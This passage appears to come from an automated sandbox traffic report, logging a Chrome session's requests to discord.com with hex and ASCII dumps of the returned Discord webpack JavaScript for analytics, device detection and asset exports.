                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=36UR1xj7QXALJHlPkKNYSZak_acowoTVIs8M.pfmOLE-1702226715939-0-604800000
                                                                          2023-12-10 16:45:17 UTC1121INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 33 37 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 35 36 38 65 32 38 64 66 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:17 GMTContent-Type: application/javascriptContent-Length: 9371Connection: closeCF-Ray: 8336f51568e28df7-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:17 UTC248INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 36 37 33 37 22 5d 2c 7b 34 30 34 36 30 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 73 2e 72 28 74 29 2c 73 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 7d 7d 29 3b 76 61 72 20 69 3d 73 28 22 38 37 32 37 31 37 22 29 2c 6e 3d 73 28 22 39 31 33 31 34 34 22 29 2c 61 3d 73 28 22 34 30 34 31 31 38 22 29 2c 64 3d 73 28 22 32 36 33 30 32 34 22 29 2c 6c 3d 73 28 22 39 33 38 32 33 37 22 29 2c 75 3d 73 28 22 33 39 35 31 31 38 22
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["26737"],{404607:function(e,t,s){"use strict";s.r(t),s.d(t,{default:function(){return I}});var i=s("872717"),n=s("913144"),a=s("404118"),d=s("263024"),l=s("938237"),u=s("395118"
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 29 2c 72 3d 73 28 22 32 35 30 38 35 30 22 29 2c 68 3d 73 28 22 38 36 37 39 36 35 22 29 2c 6f 3d 73 28 22 34 39 31 31 31 22 29 2c 63 3d 73 28 22 37 38 32 33 34 30 22 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 73 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 77 61 69 74 20 65 28 29 7d 63 61 74 63 68 28 65 29 7b 76 61 72 20 69 3b 28 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 62 6f 64 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 63 6f 64 65 29 3d 3d 3d 6f 2e 41 62 6f 72 74 43 6f 64 65 73 2e 4e 4f 4e 5f 4d 4f 44 45 52 41 54 45 44 5f 54 41 47 5f 52 45 51 55 49 52 45 44 26 26 61 2e 64 65 66 61 75 6c 74 2e 73 68 6f 77 28 7b 74 69 74 6c 65 3a 74 2c 62 6f 64 79 3a 73 7d 29 7d 7d 76 61 72 20 49 3d 7b 72 65 73 6f 72 74 28 65
                                                                          Data Ascii: ),r=s("250850"),h=s("867965"),o=s("49111"),c=s("782340");async function m(e,t,s){try{return await e()}catch(e){var i;(null===(i=e.body)||void 0===i?void 0:i.code)===o.AbortCodes.NON_MODERATED_TAG_REQUIRED&&a.default.show({title:t,body:s})}}var I={resort(e
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 28 30 2c 72 2e 67 65 74 46 6f 72 75 6d 50 6f 73 74 53 65 65 6e 4d 61 6e 61 67 65 72 49 64 29 28 65 29 2c 74 2c 73 29 7d 2c 66 6c 75 73 68 53 65 65 6e 49 74 65 6d 73 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 75 2e 46 6f 72 63 65 46 6c 75 73 68 54 79 70 65 2e 49 4d 4d 45 44 49 41 54 45 5f 57 49 54 48 5f 43 4f 4f 4c 44 4f 57 4e 3b 28 30 2c 6c 2e 66 6c 75 73 68 41 6e 61 6c 79 74 69 63 73 46 65 65 64 49 74 65 6d 73 29 28 28 30 2c 72 2e 67 65 74 46 6f 72 75 6d 50 6f 73 74 53 65 65 6e 4d 61 6e 61 67 65 72 49 64 29 28 65 29 2c 74 29 7d 2c 61 73 79 6e 63 20 73 65 61 72 63 68 46 6f 72 75 6d 50 6f 73 74 73 28 65 2c
                                                                          Data Ascii: (0,r.getForumPostSeenManagerId)(e),t,s)},flushSeenItems(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:u.ForceFlushType.IMMEDIATE_WITH_COOLDOWN;(0,l.flushAnalyticsFeedItems)((0,r.getForumPostSeenManagerId)(e),t)},async searchForumPosts(e,
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 77 69 6e 64 6f 77 49 64 3a 73 2c 69 73 50 61 75 73 65 64 3a 69 7d 29 7b 73 75 70 65 72 28 7b 77 69 6e 64 6f 77 49 64 3a 73 2c 69 73 50 61 75 73 65 64 3a 69 2c 69 64 3a 75 28 74 29 7d 29 2c 74 68 69 73 2e 63 72 65 61 74 65 46 6c 75 73 68 53 65 65 6e 49 74 65 6d 73 46 75 6e 63 74 69 6f 6e 3d 65 3d 3e 7b 6c 65 74 20 74 3d 74 68 69 73 2e 74 72 61 63 6b 65 64 46 65 65 64 49 74 65 6d 73 2c 73 3d 74 68 69 73 2e 63 68 61 6e 6e 65 6c 49 64 2c 69 3d 74 68 69 73 2e 67 75 69 6c 64 49 64 2c 6e 3d 74 68 69 73 2e 73 65 73 73 69 6f 6e 49 64 2c 61 3d 7b 67 75 69 6c 64 49 64 3a 69 2c 63 68 61 6e 6e 65 6c 49 64 3a 73 2c 73 65 73 73 69 6f 6e 49 64 3a 6e 2c 74 72 61 63 6b 65 64 46 65 65 64 49 74 65 6d 73 3a 74 2c 69 73 46 6f 72 63 65 64 46 6c 75 73 68 3a 6e 75 6c 6c 21 3d 65
                                                                          Data Ascii: windowId:s,isPaused:i}){super({windowId:s,isPaused:i,id:u(t)}),this.createFlushSeenItemsFunction=e=>{let t=this.trackedFeedItems,s=this.channelId,i=this.guildId,n=this.sessionId,a={guildId:i,channelId:s,sessionId:n,trackedFeedItems:t,isForcedFlush:null!=e
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 73 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 69 2c 6e 2c 61 2c 64 2c 6c 3d 73 28 22 36 32 37 34 34 35 22 29 2c 75 3d 73 2e 6e 28 6c 29 2c 72 3d 73 28 22 39 31 33 31 34 34 22 29 3b 28 61 3d 69 7c 7c 28 69 3d 7b 7d 29 29 2e 47 55 49 4c 44 5f 48 4f 4d 45 3d 22 67 75 69 6c 64 5f 68 6f 6d 65 22 2c 61 2e 46 4f 52 55 4d 5f 43 48 41 4e 4e 45 4c 3d 22 66 6f 72 75 6d 5f 63 68 61 6e 6e 65 6c 22 2c 28 64 3d 6e 7c 7c 28 6e 3d 7b 7d 29 29 5b 64 2e 49 4d 4d 45 44 49 41 54 45 3d 30 5d 3d 22 49 4d 4d 45 44 49 41 54 45 22 2c 64 5b 64 2e 49 4d 4d 45 44 49 41 54 45 5f 57 49 54 48 5f 43 4f 4f 4c 44 4f 57 4e 3d 31 5d 3d 22 49 4d 4d 45 44 49 41 54 45 5f 57 49 54 48 5f 43 4f 4f 4c 44 4f 57 4e 22 2c 64 5b 64 2e 49 4d 4d 45 44 49 41 54 45 5f 57 49 54 48 5f 44 45 4c 41 59 3d 32
                                                                          Data Ascii: s("222007");var i,n,a,d,l=s("627445"),u=s.n(l),r=s("913144");(a=i||(i={})).GUILD_HOME="guild_home",a.FORUM_CHANNEL="forum_channel",(d=n||(n={}))[d.IMMEDIATE=0]="IMMEDIATE",d[d.IMMEDIATE_WITH_COOLDOWN=1]="IMMEDIATE_WITH_COOLDOWN",d[d.IMMEDIATE_WITH_DELAY=2
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 69 6d 65 4d 69 6c 6c 69 73 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 30 3d 3d 3d 65 7c 7c 31 3d 3d 3d 65 29 3f 6e 65 77 20 50 72 6f 6d 69 73 65 28 61 73 79 6e 63 20 65 3d 3e 7b 61 77 61 69 74 20 74 28 29 2c 65 28 29 7d 29 3a 6e 65 77 20 50 72 6f 6d 69 73 65 28 65 3d 3e 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 73 79 6e 63 28 29 3d 3e 7b 61 77 61 69 74 20 74 28 29 2c 65 28 29 7d 2c 31 30 30 29 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 7b 69 64 3a 65 2c 77 69 6e 64 6f 77 49 64 3a 74 2c 69 73 50 61 75 73 65 64 3a 73 7d 29 7b 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 3d 28 29 3d 3e 7b 76 61 72 20 65 3b 72 2e 64 65 66 61 75 6c 74 2e 73 75 62 73 63 72 69 62 65 28 22 41 4e 41 4c 59 54 49 43 53 5f 46 45 45 44 5f 49 54 45 4d 5f 53 45 45 4e 22 2c 74 68 69 73 2e 68 61
                                                                          Data Ascii: imeMillis=Date.now(),0===e||1===e)?new Promise(async e=>{await t(),e()}):new Promise(e=>{setTimeout(async()=>{await t(),e()},100)})}constructor({id:e,windowId:t,isPaused:s}){this.initialize=()=>{var e;r.default.subscribe("ANALYTICS_FEED_ITEM_SEEN",this.ha
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 46 6c 75 73 68 53 65 65 6e 49 74 65 6d 73 28 73 29 7d 2c 74 68 69 73 2e 68 61 6e 64 6c 65 46 65 65 64 49 74 65 6d 53 65 65 6e 3d 65 3d 3e 7b 76 61 72 20 74 3b 6c 65 74 20 73 3d 65 2e 69 64 2c 69 3d 65 2e 74 69 6d 65 73 74 61 6d 70 4d 69 6c 6c 69 73 2c 6e 3d 65 2e 66 65 65 64 49 74 65 6d 49 64 3b 69 66 28 73 21 3d 3d 74 68 69 73 2e 5f 69 64 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 5f 70 61 75 73 65 64 29 7b 74 68 69 73 2e 5f 70 61 75 73 65 64 46 65 65 64 49 74 65 6d 49 64 73 2e 61 64 64 28 6e 29 3b 72 65 74 75 72 6e 7d 6c 65 74 20 61 3d 74 68 69 73 2e 67 65 74 54 72 61 63 6b 65 64 46 65 65 64 49 74 65 6d 28 6e 29 2c 64 3d 61 2e 6d 61 79 62 65 4d 61 72 6b 53 65 65 6e 28 69 29 3b 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 6f 6e 46 65 65 64 49 74 65
                                                                          Data Ascii: FlushSeenItems(s)},this.handleFeedItemSeen=e=>{var t;let s=e.id,i=e.timestampMillis,n=e.feedItemId;if(s!==this._id)return;if(this._paused){this._pausedFeedItemIds.add(n);return}let a=this.getTrackedFeedItem(n),d=a.maybeMarkSeen(i);null===(t=this.onFeedIte
                                                                          2023-12-10 16:45:17 UTC909INData Raw: 74 20 65 3d 74 68 69 73 2e 67 65 74 56 69 73 69 62 6c 65 46 65 65 64 49 74 65 6d 49 64 73 28 29 3b 65 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 74 68 69 73 2e 68 61 6e 64 6c 65 46 65 65 64 49 74 65 6d 55 6e 73 65 65 6e 28 7b 69 64 3a 74 68 69 73 2e 5f 69 64 2c 66 65 65 64 49 74 65 6d 49 64 3a 65 2c 74 69 6d 65 73 74 61 6d 70 4d 69 6c 6c 69 73 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 74 79 70 65 3a 22 41 4e 41 4c 59 54 49 43 53 5f 46 45 45 44 5f 49 54 45 4d 5f 55 4e 53 45 45 4e 22 7d 29 7d 29 2c 74 68 69 73 2e 5f 70 61 75 73 65 64 3d 21 30 2c 74 68 69 73 2e 5f 70 61 75 73 65 64 46 65 65 64 49 74 65 6d 49 64 73 3d 65 7d 2c 74 68 69 73 2e 72 65 73 75 6d 65 3d 28 29 3d 3e 7b 74 68 69 73 2e 5f 70 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 70 61 75 73 65 64 3d 21 31 2c
                                                                          Data Ascii: t e=this.getVisibleFeedItemIds();e.forEach(e=>{this.handleFeedItemUnseen({id:this._id,feedItemId:e,timestampMillis:Date.now(),type:"ANALYTICS_FEED_ITEM_UNSEEN"})}),this._paused=!0,this._pausedFeedItemIds=e},this.resume=()=>{this._paused&&(this._paused=!1,


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          303192.168.2.550039162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:16 UTC866OUTGET /assets/48449.255f5bbd30481bc03d50.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Oj2WPjrxAPrNGTRJmGRQ0jfyfob_UqLvi5IrF7Qyx1o-1702226716526-0-604800000
                                                                          2023-12-10 16:45:17 UTC972INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 35 31 39 32 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 35 66 62 35 65 37 34 36 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:17 GMTContent-Type: application/javascriptContent-Length: 551925Connection: closeCF-Ray: 8336f515fb5e7469-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:17 UTC397INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 38 34 34 39 22 5d 2c 7b 36 36 32 36 39 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 69 3d 7b 7d 3b 69 2e 69 73 53 61 66 61 72 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 61 76 69 67 61 74 6f 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 76 65 6e 64 6f 72 29 26 26 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 6e 61 76 69 67 61 74 6f 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 74 3d 6e
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["48449"],{662697:function(e,t,n){let i={};i.isSafari=function(){var e,t,n;return(null===(e=navigator)||void 0===e?void 0:e.vendor)&&(null===(n=navigator)||void 0===n?void 0:null===(t=n
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 65 78 4f 66 28 22 46 78 69 4f 53 22 29 7d 2c 69 2e 69 73 4d 6f 62 69 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3b 6c 65 74 20 6e 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 7c 7c 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 61 76 69 67 61 74 6f 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 76 65 6e 64 6f 72 29 7c 7c 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 77 69 6e 64 6f 77 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6f 70 65 72 61 29 3b 72 65 74 75 72 6e 2f 69 50 68 6f 6e 65 7c 69 50 61 64 7c 69 50 6f 64 7c 41 6e 64 72 6f 69 64 7c 49 45 4d 6f 62 69 6c 65 7c 57 69 6e 64 6f 77 73 20 50 68 6f 6e 65 7c 42 6c 61 63 6b 42 65 72 72 79 7c 77 65 62 4f 53 7c 4f 70 65 72 61 20 4d 69 6e 69 7c 4e
                                                                          Data Ascii: exOf("FxiOS")},i.isMobile=function(){var e,t;let n=navigator.userAgent||(null===(e=navigator)||void 0===e?void 0:e.vendor)||(null===(t=window)||void 0===t?void 0:t.opera);return/iPhone|iPad|iPod|Android|IEMobile|Windows Phone|BlackBerry|webOS|Opera Mini|N
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 28 74 65 7c 75 69 7c 78 6f 29 7c 6d 63 28 30 31 7c 32 31 7c 63 61 29 7c 6d 5c 2d 63 72 7c 6d 65 28 72 63 7c 72 69 29 7c 6d 69 28 6f 38 7c 6f 61 7c 74 73 29 7c 6d 6d 65 66 7c 6d 6f 28 30 31 7c 30 32 7c 62 69 7c 64 65 7c 64 6f 7c 74 28 5c 2d 7c 20 7c 6f 7c 76 29 7c 7a 7a 29 7c 6d 74 28 35 30 7c 70 31 7c 76 20 29 7c 6d 77 62 70 7c 6d 79 77 61 7c 6e 31 30 5b 30 2d 32 5d 7c 6e 32 30 5b 32 2d 33 5d 7c 6e 33 30 28 30 7c 32 29 7c 6e 35 30 28 30 7c 32 7c 35 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70
                                                                          Data Ascii: (te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|p
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 62 64 39 36 35 35 33 35 34 36 64 61 32 36 61 34 63 37 30 62 2e 73 76 67 22 7d 2c 36 39 38 38 33 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 62 64 39 36 35 35 33 35 34 36 64 61 32 36 61 34 63 37 30 62 2e 73 76 67 22 7d 2c 31 34 33 36 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 61 30 65 65 63 37 63 65 38 30 30 64 35 65 38 66 37 61 37 63 2e 70 6e 67 22 7d 2c 32 38 36 36 31 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 31 61 65 65 36 39 37 35 39 31
                                                                          Data Ascii: xports=n.p+"bd96553546da26a4c70b.svg"},698833:function(e,t,n){"use strict";e.exports=n.p+"bd96553546da26a4c70b.svg"},14366:function(e,t,n){"use strict";e.exports=n.p+"a0eec7ce800d5e8f7a7c.png"},286611:function(e,t,n){"use strict";e.exports=n.p+"1aee697591
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 31 65 61 39 38 36 63 36 34 37 33 31 38 36 30 64 61 31 36 38 2e 70 6e 67 22 7d 2c 34 39 36 39 35 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 65 63 30 34 38 62 34 62 62 63 66 34 37 64 34 35 63 37 66 36 2e 73 76 67 22 7d 2c 36 31 32 33 31 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 35 38 39 62 63 63 37 38 63 30 32 61 31 31 63 30 37 62 33 62 2e 70 6e 67 22 7d 2c 31 35 32 30 37 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73
                                                                          Data Ascii: unction(e,t,n){"use strict";e.exports=n.p+"1ea986c64731860da168.png"},496955:function(e,t,n){"use strict";e.exports=n.p+"ec048b4bbcf47d45c7f6.svg"},612315:function(e,t,n){"use strict";e.exports=n.p+"589bcc78c02a11c07b3b.png"},152071:function(e,t,n){"use s
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 63 63 39 31 32 62 66 35 36 61 66 30 66 64 33 62 63 33 30 31 2e 73 76 67 22 7d 2c 34 37 39 31 31 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 37 65 64 33 63 35 61 39 37 32 33 38 61 32 33 63 62 36 36 32 2e 70 6e 67 22 7d 2c 35 39 32 34 36 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 39 32 31 30 61 63 63 65 61 35 36 31 30 32 62 32 37 30 33 39 2e 73 76 67 22 7d 2c 33 30 30 35 32 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 37 38 38 36 37 36 34 65 61 34 61 32 30 65 39 37 35 34 36 30 2e
                                                                          Data Ascii: cc912bf56af0fd3bc301.svg"},479111:function(e,t,n){"use strict";e.exports=n.p+"7ed3c5a97238a23cb662.png"},592466:function(e,t,n){"use strict";e.exports=n.p+"9210accea56102b27039.svg"},300525:function(e,t,n){"use strict";e.exports=n.p+"7886764ea4a20e975460.
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 33 31 30 37 36 66 65 61 63 30 34 31 64 61 34 64 64 30 37 30 2e 73 76 67 22 7d 2c 37 37 37 36 32 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 30 37 65 31 61 35 33 62 63 38 34 63 36 32 33 31 66 39 32 66 2e 70 6e 67 22 7d 2c 35 36 36 30 33 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 64 34 36 37 35 36 66 37 38 32 65 31 39 33 35 35 65 34 38 33 2e 73 76 67 22 7d 2c 38 37 37 34 31 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65
                                                                          Data Ascii: e,t,n){"use strict";e.exports=n.p+"31076feac041da4dd070.svg"},777626:function(e,t,n){"use strict";e.exports=n.p+"07e1a53bc84c6231f92f.png"},566035:function(e,t,n){"use strict";e.exports=n.p+"d46756f782e19355e483.svg"},877414:function(e,t,n){"use strict";e
